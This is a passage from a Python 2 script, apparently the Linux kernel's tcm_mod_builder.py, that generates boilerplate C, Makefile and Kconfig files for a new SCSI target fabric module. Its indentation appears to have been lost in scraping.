buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!" + fabric_mod_port + ") {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static const struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .module = THIS_MODULE,\n"
buf += " .name = \"" + fabric_mod_name + "\",\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .aborted_task = " + fabric_mod_name + "_aborted_task,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += "\n"
buf += " .tfc_wwn_attrs = " + fabric_mod_name + "_wwn_attrs,\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " return target_register_template(&" + fabric_mod_name + "_ops);\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " target_unregister_template(&" + fabric_mod_name + "_ops);\n"
buf += "};\n\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi_common.h>\n"
buf += "#include <scsi/scsi_proto.h>\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('\*release_cmd\)\(', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "void " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('aborted_task\)\(', fo):
buf += "void " + fabric_mod_name + "_aborted_task(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_aborted_task(struct se_cmd *);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + " to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + " to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.